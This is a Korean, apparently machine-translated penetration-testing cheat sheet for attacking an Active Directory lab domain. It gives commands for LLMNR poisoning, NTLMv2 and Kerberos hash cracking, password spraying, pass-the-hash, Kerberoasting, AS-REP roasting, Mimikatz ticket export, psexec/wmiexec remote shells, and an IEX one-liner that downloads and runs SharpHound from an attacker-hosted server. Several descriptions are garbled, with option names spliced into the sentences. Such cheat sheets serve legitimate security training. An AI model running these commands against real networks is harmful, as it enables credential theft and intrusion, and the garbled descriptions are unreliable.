Cheat seat

초기 열거

명령

설명

nslookup ns1.inlanefreight.com

도메인 이름 시스템을 쿼리하고 Linux 기반 호스트에서 입력된 대상의 도메인 이름 매핑에 대한 IP 주소를 검색하는 데 사용됩니다.

sudo tcpdump -i ens224

-iLinux 기반 호스트 옵션을 진행하는 네트워크 인터페이스에서 네트워크 패킷 캡처를 시작하는 데 사용됩니다 .

sudo responder -I ens224 -A

를 사용하여 활성화된 모드 에서 옵션을 진행하고 작동하도록 지정된 인터페이스에 대한 응답 및 분석, 쿼리를 시작 LLMNR하는 데 사용됩니다 . Linux 기반 호스트에서 수행됨NBT-NSMDNS -IPassive Analysis-A

fping -asgq 172.16.5.0/23

Linux 기반 호스트에서 지정된 네트워크 세그먼트에 대해 ping 스윕을 수행합니다.

sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum

진행 중인 파일에 지정된 -A호스트 목록( )을 기반으로 OS 감지, 버전 감지, 스크립트 스캐닝 및 Traceroute가 활성화된( ) nmap 스캔을 수행합니다 . 그런 다음 옵션 뒤에 지정된 파일에 검사 결과를 출력합니다 . Linux 기반 호스트에서 수행됨hosts.txt-iL-oN

sudo git clone https://github.com/ropnop/kerbrute.git

gitLinux 기반 호스트에서 kerbrute 도구를 복제하는 데 사용됩니다 .

make help

makeLinux 기반 호스트에서 가능한 컴파일 옵션을 나열하는 데 사용됩니다 .

sudo make all

Kerbrute여러 OS 플랫폼 및 CPU 아키텍처에 대한 바이너리를 컴파일하는 데 사용됩니다 .

./kerbrute_linux_amd64

KebruteLinux 기반 호스트에서 선택한 컴파일된 바이너리를 테스트하는 데 사용됩니다 .

sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute

Kerbrute바이너리를 디렉터리로 이동하는 데 사용되며 Linux 사용자의 경로에 있도록 설정할 수 있습니다. 도구 사용을 더욱 쉽게 만듭니다.

./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results

INLANEFREIGHT.LOCALKerbrute 도구를 실행하여 지정된 도메인( )에서 -d옵션을 진행하고 연결된 도메인 컨트롤러에서 --dc단어 목록을 사용하여 지정된 사용자 이름을 검색하고 -o결과를 지정된 파일로 출력합니다( ). Linux 기반 호스트에서 수행됩니다.

LLMNR/NTB-NS 중독

명령

설명

responder -h

ResponderLinux 기반 호스트에서 사용할 수 있는 사용 지침과 다양한 옵션을 표시하는 데 사용됩니다 .

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

응답자가 캡처하여 파일( )에 저장된 해시를 hashcat크랙 NTLMv2( )하는 데 사용됩니다 . 크래킹은 지정된 단어 목록을 기반으로 수행됩니다.-mfrond_ntlmv2

Import-Module .\Inveigh.ps1

PowerShell cmd-let을 사용하여 Import-ModuleWindows 기반 도구를 가져옵니다 Inveigh.ps1.

(Get-Command Invoke-Inveigh).Parameters

에서 사용할 수 있는 다양한 옵션 및 기능을 출력하는 데 사용됩니다 Invoke-Inveigh. Windows 기반 호스트에서 수행됩니다.

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

LLMNR 및 NBNS 스푸핑이 활성화된 Windows 기반 호스트에서 시작 Inveigh하고 결과를 파일로 출력합니다.

.\Inveigh.exe

Windows 기반 호스트에서 C#구현을 시작합니다 .Inveigh

esc -> GET NTLMV2UNIQUE. 입력

NTLMv2 해시 획득 (Inveigh에서)

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

Windows 호스트에서 NBT-NS를 비활성화하는 데 사용되는 PowerShell 스크립트입니다.

비밀번호 스프레이 및 비밀번호 정책

명령

설명

#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x; done

16,079,616Linux 기반 호스트에서 가능한 사용자 이름 조합을 생성하는 데 사용되는 Bash 스크립트입니다 .

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

Linux 기반 호스트에서 암호 정책( )을 열거하기 위해 CrackMapExec유효한 자격 증명( )을 사용합니다 .avazquez:Password123--pass-pol

rpcclient -U "" -N 172.16.5.5

rpcclient세션을 통해 도메인에 대한 정보를 검색하는 데 사용됩니다 SMB NULL. Linux 기반 호스트에서 수행됩니다.

rpcclient $> querydominfo

rpcclientLinux 기반 호스트에서 대상 Windows 도메인의 비밀번호 정책을 열거하는 데 사용됩니다 .

enum4linux -P 172.16.5.5

Linux 기반 호스트의 대상 Windows 도메인에서 enum4linux비밀번호 정책( )을 열거하는 데 사용됩니다 .-P

enum4linux-ng -P 172.16.5.5 -oA ilfreight

enum4linux-ngLinux 기반 호스트의 대상 Windows 도메인에서 비밀번호 정책( )을 열거하는 데 사용되며 -P, 옵션을 진행하는 파일에 저장된 YAML 및 JSON으로 출력을 표시합니다 -oA.

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

ldapsearchLinux 기반 호스트에서 대상 Windows 도메인의 비밀번호 정책을 열거하는 데 사용됩니다 .

net accounts

Windows 기반 호스트에서 Windows 도메인의 암호 정책을 열거하는 데 사용됩니다.

wget -q https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Import-Module .\PowerView.ps1

Import-Module cmd-let을 사용하여 PowerView.ps1Windows 기반 호스트에서 도구를 가져옵니다.

Get-DomainPolicy

Windows 기반 호스트에서 대상 Windows 도메인의 비밀번호 정책을 열거하는 데 사용됩니다.

enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

enum4linux대상 Windows 도메인에서 사용자 계정을 검색한 다음 grep출력을 필터링하여 Linux 기반 호스트의 사용자를 표시하는 데 사용합니다 .

rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomuser

rpcclient를 사용하여 Linux 기반 호스트에서 대상 Windows 도메인의 사용자 계정을 검색합니다.

crackmapexec smb 172.16.5.5 --users

Linux 기반 호스트에서 대상 Windows 도메인의 CrackMapExec사용자( )를 검색하는 데 사용됩니다 .--users

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

대상 Windows 도메인에서 사용자를 검색한 다음 Linux 기반 호스트의 결과만 표시하기 위해 ldapsearch출력을 필터링하는 데 사용됩니다 .grepsAMAccountName

./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Python 도구를 사용하여 windapsearch.pyLinux 기반 호스트에서 대상 Windows 도메인의 사용자를 검색합니다.

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Linux 기반 호스트의 rpcclient사용자 목록( ) 을 사용하여 비밀번호 스프레이 공격을 수행하는 데 사용되는 Bash 한 줄입니다 . valid_users.txt또한 출력을 더 깔끔하게 만들기 위해 실패한 시도를 필터링합니다.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

kerbrute및 사용자 목록( )을 사용하여 valid_users.txtLinux 기반 호스트에서 대상 Windows 도메인에 대해 비밀번호 스프레이 공격을 수행합니다.

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

CrackMapExec및 사용자 목록( )을 사용하여 valid_users.txtLinux 기반 호스트에서 대상 Windows 도메인에 대해 비밀번호 스프레이 공격을 수행합니다. 또한 를 사용하여 로그온 실패를 필터링합니다 grep.

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

CrackMapExecLinux 기반 호스트에서 자격 증명 집합의 유효성을 검사하는 데 사용됩니다 .

sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Linux 기반 호스트에서 한 번의 로그인 시도만 수행되도록 하려면 CrackMapExec및 - 플래그를 사용합니다 . -local-auth이는 시행된 비밀번호 정책으로 인해 계정이 잠기지 않도록 하기 위한 것입니다. 또한 를 사용하여 로그온 실패를 필터링합니다 grep.

Import-Module .\DomainPasswordSpray.ps1

DomainPasswordSpray.ps1Windows 기반 호스트에서 PowerShell 기반 도구를 가져오는 데 사용됩니다 .

Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

패스워드 스프레이 공격을 수행하고 그 결과를 spray_successWindows 기반 호스트에서 지정된 파일( )로 출력(-OutFile)합니다.

보안 제어 열거

명령

설명

Get-MpComputerStatus

Windows Defender Anti-VirusWindows 기반 호스트 의 상태를 확인하는 데 사용되는 PowerShell cmd-let입니다 .

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

AppLockerWindows 기반 호스트에서 정책을 보는 데 사용되는 PowerShell cmd-let입니다 .

$ExecutionContext.SessionState.LanguageMode

PowerShell Language ModeWindows 기반 호스트에서 사용되는 것을 검색하는 데 사용되는 PowerShell 스크립트입니다 . Windows 기반 호스트에서 수행됩니다.

Find-LAPSDelegatedGroups

Windows 기반 호스트에서 LAPSToolkit검색하는 기능입니다 .LAPS Delegated Groups

Find-AdmPwdExtendedRights

LAPSTookit읽기 권한이 있는 그룹과 사용자에 대해 LAPS가 활성화된 각 컴퓨터에서 권한을 확인하는 기능 입니다 All Extended Rights. Windows 기반 호스트에서 수행됩니다.

Get-LAPSComputers

LAPSToolkitLAPS가 활성화된 컴퓨터를 검색하고, 비밀번호 만료를 검색하고, 무작위 비밀번호를 검색할 수 있는 기능입니다 . Windows 기반 호스트에서 수행됩니다.

자격 증명 열거

명령

설명

xfreerdp /u:forend@inlanefreight.local /p:Klmcargo2 /v:172.16.5.25

유효한 자격 증명을 사용하여 Windows 대상에 연결합니다. Linux 기반 호스트에서 수행됩니다.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users

유효한 자격 증명을 사용하여 Windows 대상으로 인증 하고 대상 Windows 도메인에서 smb더 많은 사용자( )를 검색하려고 시도합니다 . --usersLinux 기반 호스트에서 수행됩니다.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups

유효한 자격 증명을 사용하여 Windows 대상으로 인증 하고 대상 Windows 도메인에서 smb그룹( ) 검색을 시도합니다 . --groupsLinux 기반 호스트에서 수행됩니다.

sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users

유효한 자격 증명을 사용하여 Windows 대상으로 인증하고 대상 Windows 호스트에 smb로그온한 사용자( ) 목록을 확인하려고 시도합니다 . --loggedon-usersLinux 기반 호스트에서 수행됩니다.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares

유효한 자격 증명을 사용하여 Windows 대상으로 인증 smb하고 SMB 공유 검색을 시도합니다( --shares). Linux 기반 호스트에서 수행됩니다.

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share

유효한 자격 증명을 사용하여 Windows 대상으로 인증하고 smbCrackMapExec 모듈( -M) 을 활용하여 spider_plus읽기 가능한 각 공유( )를 살펴보고 Dev-share읽을 수 있는 모든 파일을 나열합니다. 결과는 에 출력됩니다 JSON. Linux 기반 호스트에서 수행됩니다.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5

유효한 자격 증명을 사용하여 대상 Windows 도메인을 열거하고 사용된 유효한 자격 증명 및 대상 Windows 호스트의 컨텍스트 내에서 각각에 사용 가능한 공유 및 권한을 나열합니다( -H). Linux 기반 호스트에서 수행됩니다.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only

유효한 자격 증명을 사용하여 대상 Windows 도메인을 열거하고 -R지정된 공유( )의 재귀 목록( ) 을 수행하며 공유의 SYSVOL디렉터리 목록( )만 출력합니다 . --dir-onlyLinux 기반 호스트에서 수행됩니다.

rpcclient $> queryuser 0x457

상대 식별자( )를 사용하여 Windows 도메인의 대상 사용자 계정을 열거합니다 0x457. Linux 기반 호스트에서 수행됩니다.

rpcclient $> enumdomusers

대상 Windows 도메인의 사용자 계정 및 관련 상대 식별자( rid)를 검색합니다. Linux 기반 호스트에서 수행됩니다.

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125

유효한 자격 증명이 있는 관리 공유를 CLI통해 Windows 대상 에 연결하는 데 사용되는 Impacket 도구입니다 . ADMIN$Linux 기반 호스트에서 수행됩니다.

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5

유효한 자격 증명을 CLI통해 Windows 대상 에 연결하는 데 사용되는 Impacket 도구입니다 . WMILinux 기반 호스트에서 수행됩니다.

windapsearch.py -h

windapsearch.py의 옵션과 기능을 표시하는 데 사용됩니다. Linux 기반 호스트에서 수행됩니다.

python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 --da

--da대상 Windows 도메인에서 유효한 자격 증명 세트를 사용하여 도메인 관리자 그룹( )을 열거하는 데 사용됩니다 . Linux 기반 호스트에서 수행됩니다.

python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p transporter@4 -PU

-PU유효한 자격 증명을 사용하여 중첩된 권한이 있는 사용자에 대해 재귀 검색( )을 수행하는 데 사용됩니다 . Linux 기반 호스트에서 수행됩니다.

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

유효한 자격 증명을 사용하여 BloodHound( )의 Python 구현을 실행 bloodhound.py하고 이름 서버( -ns) 및 대상 Windows 도메인( inlanefreight.local)을 지정하고 모든 검사( -c all)를 실행합니다. 유효한 자격 증명을 사용하여 실행됩니다. Linux 기반 호스트에서 수행됩니다.

땅에서 생활하여 열거

명령

설명

Get-Module

Windows 기반 호스트에서 사용 가능한 모든 모듈, 해당 버전 및 명령 옵션을 나열하는 데 사용되는 PowerShell cmd-let입니다.

Import-Module ActiveDirectory

Active DirectoryWindows 기반 호스트에서 PowerShell 모듈을 로드합니다 .

Get-ADDomain

Windows 기반 호스트에서 Windows 도메인 정보를 수집하는 데 사용되는 PowerShell cmd-let입니다.

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

대상 Windows 도메인의 사용자 계정을 열거하고 ServicePrincipalName. Windows 기반 호스트에서 수행됩니다.

Get-ADTrust -Filter *

대상 Windows 도메인의 신뢰 관계를 열거하고 임의( -Filter *)로 필터링하는 데 사용되는 PowerShell cmd-let입니다. Windows 기반 호스트에서 수행됩니다.

Get-ADGroup -Filter * | select name

대상 Windows 도메인의 그룹을 열거하고 그룹 이름( select name)으로 필터링하는 데 사용되는 PowerShell cmd-let입니다. Windows 기반 호스트에서 수행됩니다.

Get-ADGroup -Identity "Backup Operators"

특정 그룹( -Identity "Backup Operators")을 검색하는 데 사용되는 PowerShell cmd-let입니다. Windows 기반 호스트에서 수행됩니다.

Get-ADGroupMember -Identity "Backup Operators"

특정 그룹( )의 구성원을 검색하는 데 사용되는 PowerShell cmd-let입니다 -Identity "Backup Operators". Windows 기반 호스트에서 수행됩니다.

Export-PowerViewCSV

결과를 파일에 추가하는 데 사용되는 PowerView 스크립트입니다 CSV. Windows 기반 호스트에서 수행됩니다.

ConvertTo-SID

User또는 Group이름을 으로 변환하는 데 사용되는 PowerView 스크립트입니다 SID. Windows 기반 호스트에서 수행됩니다.

Get-DomainSPNTicket

지정된 서비스 주체 이름( )에 대한 Kerberos 티켓을 요청하는 데 사용되는 PowerView 스크립트입니다 SPN. Windows 기반 호스트에서 수행됩니다.

Get-Domain

현재(또는 지정된) 도메인에 대한 AD 개체를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainController

지정된 대상 도메인에 대한 대상 도메인 컨트롤러 목록을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainUser

AD의 모든 사용자 또는 특정 사용자 개체를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainComputer

AD의 모든 컴퓨터 또는 특정 컴퓨터 개체를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainGroup

AD의 모든 그룹 또는 특정 그룹 개체를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainOU

AD에서 전체 또는 특정 OU 개체를 검색하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Find-InterestingDomainAcl

ACLs기본 제공 개체가 아닌 수정 권한이 설정된 도메인에서 개체를 찾는 데 사용되는 PowerView 스크립트입니다 . Windows 기반 호스트에서 수행됩니다.

Get-DomainGroupMember

특정 도메인 그룹의 구성원을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainFileServer

파일 서버로 작동할 가능성이 있는 서버 목록을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainDFSShare

현재(또는 지정된) 도메인에 대한 모든 분산 파일 시스템 목록을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainGPO

AD의 모든 GPO 또는 특정 GPO 개체를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainPolicy

현재 도메인에 대한 기본 도메인 정책 또는 도메인 컨트롤러 정책을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-NetLocalGroup

로컬 또는 원격 시스템에서 로컬 그룹을 열거하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-NetLocalGroupMember

PowerView 스크립트는 특정 로컬 그룹의 구성원을 열거합니다. Windows 기반 호스트에서 수행됩니다.

Get-NetShare

로컬(또는 원격) 시스템에서 열린 공유 목록을 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-NetSession

로컬(또는 원격) 시스템에 대한 세션 정보를 반환하는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Test-AdminAccess

현재 사용자에게 로컬(또는 원격) 시스템에 대한 관리 액세스 권한이 있는지 테스트하는 데 사용되는 PowerView 스크립트. Windows 기반 호스트에서 수행됩니다.

Find-DomainUserLocation

특정 사용자가 로그인한 컴퓨터를 찾는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Find-DomainShare

도메인 컴퓨터에서 연결 가능한 공유를 찾는 데 사용되는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Find-InterestingDomainShareFile

도메인의 읽기 가능한 공유에서 특정 기준과 일치하는 파일을 검색하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Find-LocalAdminAccess

현재 사용자가 로컬 관리자 액세스 권한을 갖고 있는 로컬 도메인에서 컴퓨터를 찾는 데 사용되는 PowerView 스크립트 Windows 기반 호스트에서 수행됩니다.

Get-DomainTrust

현재 도메인 또는 지정된 도메인에 대한 도메인 트러스트를 반환하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-ForestTrust

현재 포리스트 또는 지정된 포리스트에 대한 모든 포리스트 트러스트를 반환하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainForeignUser

사용자 도메인 외부 그룹에 있는 사용자를 열거하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainForeignGroupMember

그룹 도메인 외부의 사용자가 포함된 그룹을 열거하고 각 외부 구성원을 반환하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainTrustMapping

현재 도메인과 기타 표시된 모든 트러스트를 열거하는 PowerView 스크립트입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

"Domain Admins"반복 옵션( )을 사용하여 대상 그룹( )의 모든 구성원을 나열하는 데 사용되는 PowerView 스크립트입니다 -Recurse. Windows 기반 호스트에서 수행됩니다.

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

세트 가 있는 대상 Windows 도메인에서 사용자를 찾는 데 사용되는 PowerView 스크립트입니다 Service Principal Name. Windows 기반 호스트에서 수행됩니다.

.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

Snaffler손상된 계정이 액세스할 수 있는 공유에서 다양한 종류의 데이터를 찾는 대상 Windows 도메인에 대해 호출되는 도구를 실행합니다 . Windows 기반 호스트에서 수행됩니다.

파일 전송 중

명령

설명

sudo python3 -m http.server 8001

빠른 파일 호스팅을 위해 Python 웹 서버를 시작합니다. Linux 기반 호스트에서 수행됩니다.

"IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')"

웹 서버에서 파일을 다운로드하는 데 사용되는 PowerShell 한 줄입니다. Windows 기반 호스트에서 수행됩니다.

Evil-WinRM PS C:\Users\svc-alfresco\Desktop> .\SharpHound.exe -c All --zipFilename ILFREIGHT

SharpHound 실행

. .\SharpHound.ps1 #sharphound를 현재 세션션에 불러드림

invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice

SharpHound.ps1 실행

invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice

impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/

SMB파일의 빠른 호스팅을 위해 impacket 서버를 시작합니다 . Windows 기반 호스트에서 수행됩니다.

커베로스팅

명령

설명

sudo python3 -m pip install .

공격 호스트에 복제되는 디렉터리 내부에서 Impacket을 설치하는 데 사용됩니다. Linux 기반 호스트에서 수행됩니다.

GetUserSPNs.py -h

GetUserSPNs.pyLinux 기반 호스트 의 옵션과 기능을 표시하는 데 사용되는 Impacket 도구입니다 .

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday

SPNsLinux 기반 호스트에서 대상 Windows 도메인 의 목록을 가져오는 데 사용되는 Impacket 도구입니다 .

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request

-requestLinux 기반 호스트에서 오프라인 처리를 위해 모든 TGS 티켓을 다운로드/요청( )하는 데 사용되는 Impacket 도구입니다 .

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev

Linux 기반 호스트에서 -request-user특정 사용자 계정( )에 대한 TGS 티켓을 다운로드/요청( )하는 데 사용되는 Impacket 도구입니다 .sqldev

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs

특정 사용자 계정에 대한 TGS 티켓을 다운로드/요청하고 파일( -outputfile sqldev_tgs) Linux 기반 호스트에 티켓을 쓰는 데 사용되는 Impacket 도구입니다.

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

user목록에 있는 도메인 유저로 AS-REP로스팅하는 방법(Linux)

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force

Linux 기반 호스트에서 단어 목록( )을 사용하여 Kerberos( -m 13100) 티켓 해시( ) 크랙을 시도합니다.sqldev_tgshashcatrockyou.txt

setspn.exe -Q */*

SPNsWindows 기반 호스트에서 대상 Windows 도메인을 열거하는 데 사용됩니다 .

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Windows 기반 호스트에서 특정 사용자의 TGS 티켓을 다운로드/요청하는 데 사용되는 PowerShell 스크립트입니다.

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

WIndows 기반 호스트에서 모든 TGS 티켓을 다운로드/요청하는 데 사용됩니다.

mimikatz # base64 /out:true

Mimikatzbase64TGS 티켓이 Windows 기반 호스트에서 형식 으로 추출되도록 하는 명령입니다 .

kerberos::list /export

MimikatzWindows 기반 호스트에서 TGS 티켓을 추출하는 데 사용되는 명령입니다.

echo "<base64 blob>" | tr -d \

Linux 기반 호스트에서 크래킹하기 위해 base64 형식의 TGS 티켓을 준비하는 데 사용됩니다.

cat encoded_file | base64 -d > sqldev.kirbi

Linux 기반 호스트에서 파일( encoded_file)을 base64( ) 형식의 .kirbi 파일로 출력하는 데 사용됩니다.base64 -d > sqldev.kirbi

python2.7 kirbi2john.py sqldev.kirbi

를 추출하는 데 사용됩니다 Kerberos ticket. 또한 crack_fileLinux 기반 호스트에서 호출되는 파일도 생성됩니다 .

sed 's/\$krb5tgs\$$.*$:$.*$/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Linux 기반 호스트에서 crack_file를 수정하는 데 사용됩니다 .Hashcat

cat sqldev_tgs_hashcat

Linux 기반 호스트에서 준비된 해시를 보는 데 사용됩니다.

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Linux 기반 호스트에서 sqldev_tgs_hashcat단어 목록( )을 사용하여 준비된 Kerberos 티켓 해시( )를 크랙하는 데 사용됩니다 .rockyou.txt

Import-Module .\PowerView.ps1 Get-DomainUser * -spn | select samaccountname

PowerView 도구를 사용하여 TGS Tickets. Windows 기반 호스트에서 수행됩니다.

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

특정 티켓의 TGS 티켓을 다운로드/요청하고 HashcatWindows 기반 호스트에서 자동으로 포맷하는 데 사용되는 PowerView 도구입니다.

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Windows 기반 호스트에서 모든 TGS 티켓을 .CSV파일( )로 내보냅니다.ilfreight_tgs.csv

cat .\ilfreight_tgs.csv

Windows 기반 호스트에서 .csv 파일의 내용을 보는 데 사용됩니다.

.\Rubeus.exe

도구로 가능한 옵션과 기능을 보는 데 사용됩니다 Rubeus. Windows 기반 호스트에서 수행됩니다.

.\Rubeus.exe kerberoast /stats

/statsWindows 기반 호스트에서 대상 Windows 도메인 내의 kerberoast 통계( )를 확인하는 데 사용됩니다 .

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

admin개수가 설정된 계정에 대한 TGS 티켓을 요청/다운로드한 1다음 쉽게 보고 크랙할 수 있는 방식으로 출력 형식을 지정하는 데 사용됩니다( /nowrap). Windows 기반 호스트에서 수행됩니다.

.\Rubeus.exe kerberoast /user:testspn /nowrap

특정 사용자( /user:testspn)에 대한 TGS 티켓을 요청/다운로드하는 데 사용되며 보기 쉽고 크랙 방식으로 출력 형식을 지정합니다( /nowrap). Windows 기반 호스트에서 수행됩니다.

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

msDS-SupportedEncryptionType특정 사용자 계정( )과 관련된 속성을 확인하는 데 사용되는 PowerView 도구입니다 testspn. Windows 기반 호스트에서 수행됩니다.

hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt

rockyou.txtLinux 기반 호스트에서 단어 목록( )을 사용하여 티켓 해시를 해독하는 데 사용됩니다 .

ACL 열거 및 전술

명령

설명

Find-InterestingDomainAcl

Windows 기반 호스트의 기본 제공 개체에 대한 수정 권한이 설정된 대상 Windows 도메인에서 개체 ACL을 찾는 데 사용되는 PowerView 도구입니다.

Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley

PowerView를 가져오고 Windows 기반 호스트에서 SID특정 사용자 계정( )을 검색하는 데 사용됩니다.wley

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

사용자를 Windows 기반 호스트의 속성에 매핑하여 사용자에게 권한이 있는 모든 Windows 도메인 개체를 찾는 데 사용됩니다 SID.SecurityIdentifier

$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl

역방향 검색을 수행하고 GUIDWindows 기반 호스트의 값에 매핑하는 데 사용됩니다.

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

-ResolveGUIDsWindows 기반 호스트에서 GUID( )를 기반으로 검색을 수행하여 도메인 개체의 ACL을 검색하는 데 사용됩니다 .

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

대상 Windows 도메인에서 사용자 계정 그룹을 검색하고 ad_users.txtWindows 기반 호스트의 텍스트 파일( )에 출력을 추가하는 데 사용됩니다.

foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}

foreach loop텍스트 파일( ad_users.txt) 의 각 목록을 Get-ADUsercmdlet에 입력하여 대상 Windows 도메인의 각 도메인 사용자에 대한 ACL 정보를 검색한 다음 해당 사용자의 액세스 권한을 열거하는 데 사용 됩니다 . Windows 기반 호스트에서 수행됩니다.

